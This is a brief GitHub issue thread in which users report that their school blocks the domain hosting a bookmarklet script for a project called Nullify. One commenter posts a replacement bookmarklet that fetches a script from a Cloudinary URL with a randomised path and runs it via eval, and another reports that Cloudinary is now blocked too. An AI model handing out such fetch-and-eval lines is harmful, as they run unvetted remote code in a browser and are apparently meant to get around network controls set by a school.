### ISSUE TITLE
School blocks the domain

### ISSUE THREAD

**Issue by PositivityVibez** [sysplu/Nullify#65]
School is blocking the domain for
https://plu.wiki/files/bookmarklet.js
![Screenshot 2023-03-08 100159](https://user-images.githubusercontent.com/95376523/223748476-bf72f9db-6698-4623-9fa8-1029a3bbbe97.png)

**Comment by maskedwrrg** [comment]
FIXED VERSION
javascript:fetch(https://res.cloudinary.com/plu/raw/upload/v${Math.floor(Math.random() * (999999 - 999) + 999)}/nullify.js).then((res) => res.text().then((t) => eval(t)))

**Comment by SkewlBoi** [comment]
School blcked Cloudinary.com
